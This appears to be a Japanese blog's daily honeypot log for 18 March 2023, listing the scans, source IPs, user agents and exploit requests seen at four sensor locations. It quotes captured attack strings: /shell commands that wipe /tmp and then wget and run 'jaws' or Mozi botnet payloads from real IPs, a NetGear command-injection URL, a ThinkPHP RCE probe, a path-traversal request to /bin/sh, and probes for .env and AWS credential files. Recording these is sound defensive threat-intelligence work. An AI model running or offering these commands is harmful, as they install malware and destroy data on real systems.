2023/03/18 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/03/18分です。

特徴

共通

CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  103.215.81.11/jaws;
chmod /tmp/jaws;
sh /tmp/jaws

Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
/.gitへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  193.42.32.175/jaws;
sh /tmp/jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
fasthttpによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  193.42.32.175/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 128.199.134.42/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://58.136.58.192:37991/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：137 (前日比：45)
US：総アクセス数：81 (前日比：-54)
UK：総アクセス数：117 (前日比：1)
SG：総アクセス数：136 (前日比：37)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	8.218.146.80	Singapore
1	20.172.209.125	United States
2	34.69.250.57	United States
17	43.154.141.71	Singapore
2	45.11.57.48	Ukraine
1	45.56.108.128	United States
1	45.61.187.252	United States
1	45.79.128.205	United States
1	45.79.181.223	United States
1	45.141.215.67	Netherlands
1	47.254.255.160	United States
1	54.226.45.204	United States
11	61.19.208.34	Thailand
3	64.227.150.242	United States
1	79.133.51.103	Germany
1	95.214.55.109	Poland
2	109.237.98.226	Russia
7	135.125.217.54	France
6	135.125.246.110	France
2	161.35.172.216	United States
1	162.243.129.10	United States
1	167.94.138.50	United States
1	172.104.11.4	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
3	172.105.128.12	United States
1	175.107.13.205	Pakistan
5	178.128.0.206	United States
5	185.254.196.173	Ukraine
1	192.155.90.220	United States
1	192.241.213.65	United States
9	193.32.162.159	Romania
41	198.98.183.38	United States
1	198.235.24.163	United States
1	205.210.31.12	United States

UserAgent一覧

件数	UserAgent
22	`-`
1	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
17	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
64	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`HELP`
1		`\x16\x03\x01\x01H\x01`
15		`\x16\x03\x01`
1		`\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n`
1		`\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.aws/creds`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
22	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.php_cs.dist`	HTTP/1.1
1	GET	`/.s3.yml`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=elvmytis`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/actuator/env`	HTTP/1.1
1	GET	`/admin/info.php`	HTTP/1.1
1	GET	`/admin2.php`	HTTP/1.1
1	GET	`/aws/credentials`	HTTP/1.1
1	GET	`/bitrix/.settings.php.bak`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config.inc.php~`	HTTP/1.1
1	GET	`/config.php.inc`	HTTP/1.1
1	GET	`/config.php.inc~`	HTTP/1.1
1	GET	`/config.php`	HTTP/1.1
1	GET	`/config.php~`	HTTP/1.1
1	GET	`/config/phpinfo.php`	HTTP/1.1
1	GET	`/cp.php`	HTTP/1.1
1	GET	`/db/index.php`	HTTP/1.1
9	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/includes/configure.php~`	HTTP/1.1
1	GET	`/index.php3`	HTTP/1.1
1	GET	`/index.php5`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/isadmin.php`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/local_conf.php.bac`	HTTP/1.1
1	GET	`/log.json`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/mx.php`	HTTP/1.1
1	GET	`/phpfm.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfos.php`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175[.]107[.]13[.]205:55298/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/siteadmin.php`	HTTP/1.1
1	GET	`/siteadmin/index.php`	HTTP/1.1
1	GET	`/src/server.js`	HTTP/1.1
1	GET	`/status.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test9.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/wp-config.php.3`	HTTP/1.1
1	GET	`/wp-config.php.5`	HTTP/1.1
1	GET	`/wp-config.php.6`	HTTP/1.1
1	GET	`/wp-config.php.old`	HTTP/1.1
1	GET	`/wp-config.php.swo`	HTTP/1.1
1	GET	`/wp-config.php~`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
17	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.221.197.72	United States
2	35.197.176.222	United States
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
2	45.79.181.179	United States
2	45.148.120.138	Netherlands
1	51.103.88.60	United Kingdom
19	54.37.79.75	France
1	64.62.197.213	United States
1	64.62.197.222	United States
1	66.240.205.34	United States
1	74.235.184.234	United States
1	95.214.55.109	Poland
1	95.214.235.216	Ukraine
1	104.131.176.90	United States
1	109.157.50.213	United Kingdom
4	118.194.253.72	Hong Kong
4	134.122.102.130	United States
2	152.89.196.54	Russia
2	154.209.125.77	Seychelles
4	157.230.36.74	United States
2	162.142.125.225	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
4	185.142.236.41	Seychelles
7	185.254.196.223	Ukraine
7	193.32.162.159	Romania
1	198.235.24.29	United States
1	198.235.24.184	United States

UserAgent一覧

件数	UserAgent
26	`-`
1	`ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19)`
4	`Go-http-client/1.1`
1	`Java/1.8.0_361`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`\x16\x03\x01\x01\t\x01`
18		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]dropbox[.]com:443`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
7	GET	`/dispatch.asp`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 103.215.81.11/jaws;chmod+/tmp/jaws;sh+/tmp/jaws`
2	GET	`/sitemap.xml`	HTTP/1.1
2	GET	`/upl.php`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.202.113.64	China
12	3.138.153.9	United States
6	3.235.77.194	United States
1	20.168.234.112	United States
2	34.94.241.16	United States
3	45.33.80.243	United States
2	45.61.187.252	United States
1	45.79.181.94	United States
2	45.79.181.179	United States
1	45.128.232.149	Bulgaria
2	45.148.120.138	Netherlands
25	51.79.29.48	Canada
1	64.62.197.159	United States
1	64.62.197.163	United States
2	90.151.171.108	Russia
1	92.118.39.82	Romania
1	95.214.55.109	Poland
1	95.214.235.216	Ukraine
1	104.131.176.90	United States
1	118.77.99.168	China
7	140.238.69.139	United States
4	142.93.223.217	United States
2	152.89.196.54	Russia
2	154.209.125.77	Seychelles
4	159.203.8.242	United States
2	162.142.125.225	United States
1	162.243.138.9	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
3	172.104.11.51	United States
1	172.104.242.173	United States
1	185.158.113.63	Russia
1	185.225.73.79	Bulgaria
9	185.254.196.223	Ukraine
6	193.32.162.159	Romania
1	194.110.203.85	private ip address
1	201.202.246.22	Costa Rica
1	205.210.31.25	United States
1	205.210.31.44	United States

UserAgent一覧

件数	UserAgent
34	`-`
1	`Go-http-client/1.1`
1	`Hello World`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv60.0) Gecko/20100101 Firefox/60.0`
2	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
34	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11`
1	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`python-requests/2.27.1`
12	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
20		`\x16\x03\x01`
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
36	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/application/.git/config`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config/.git/config`	HTTP/1.1
1	GET	`/dev/.git/config`	HTTP/1.1
6	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/goip/`	HTTP/1.1
1	GET	`/graph_realtime.php?action=init`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/prod/.git/config`	HTTP/1.1
1	GET	`/resources/.git/config`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 193.42.32.175/jaws;sh+/tmp/jaws`
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/system/.git/config`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/.git/config`	HTTP/1.1
1	GET	`/views/.git/config`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z72612114222Q1`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	8.222.200.90	Singapore
1	20.55.53.144	United States
2	35.242.179.36	United States
1	45.33.80.243	United States
1	45.56.108.128	United States
2	45.61.187.252	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
1	45.128.232.149	Bulgaria
2	45.148.120.138	Netherlands
25	54.37.79.75	France
1	58.136.58.192	Thailand
1	78.25.93.89	Russia
1	79.133.51.221	Germany
1	92.118.39.82	Romania
32	95.214.27.18	Bulgaria
1	103.167.197.67	Vietnam
1	123.175.70.167	China
18	139.144.150.205	United States
2	152.89.196.54	Russia
4	161.35.32.76	United States
4	162.142.125.214	United States
2	162.142.125.217	United States
1	167.71.84.225	United States
2	167.94.138.127	United States
2	167.248.133.38	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
3	172.105.128.11	United States
1	176.113.115.168	Russia
1	192.155.90.220	United States
1	192.241.223.39	United States
9	193.32.162.159	Romania
1	194.55.224.203	Bulgaria
1	194.110.203.85	private ip address
1	205.210.31.54	United States
1	205.210.31.146	United States

UserAgent一覧

件数	UserAgent
30	`-`
16	`Go-http-client/1.1`
1	`Hello World`
1	`Hello, World`
2	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Flipboard/4.2.142`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
5	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
2	`fasthttp`
32	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`HELP`
1		`\x03`
19		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/BGK08n1L7pHPVX9eaJr5s4WCmZP`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/app.js`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/application/.git/config`	HTTP/1.1
1	GET	`/auth.js`	HTTP/1.1
1	GET	`/aws.js`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/.git/config`	HTTP/1.1
1	GET	`/config/app.js`	HTTP/1.1
1	GET	`/config/auth.js`	HTTP/1.1
1	GET	`/config/aws.js`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
1	GET	`/config/constants.js`	HTTP/1.1
1	GET	`/config/env.js`	HTTP/1.1
1	GET	`/config/index.js`	HTTP/1.1
1	GET	`/config/keys.js`	HTTP/1.1
1	GET	`/config/secrets.js`	HTTP/1.1
1	GET	`/config/server.js`	HTTP/1.1
1	GET	`/constants.js`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/dev/.git/config`	HTTP/1.1
9	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.js`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/keys.js`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/prod/.git/config`	HTTP/1.1
1	GET	`/resources/.git/config`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s/433323e24343e27363e23313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/secrets.js`	HTTP/1.1
1	GET	`/sendgrid2.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/server.js`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 193.42.32.175/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+128[.]199[.]134[.]42/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]136[.]58[.]192:37991/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/system/.git/config`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/vendor/.git/config`	HTTP/1.1
1	GET	`/views/.git/config`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
5	PRI	`*`	HTTP/2.0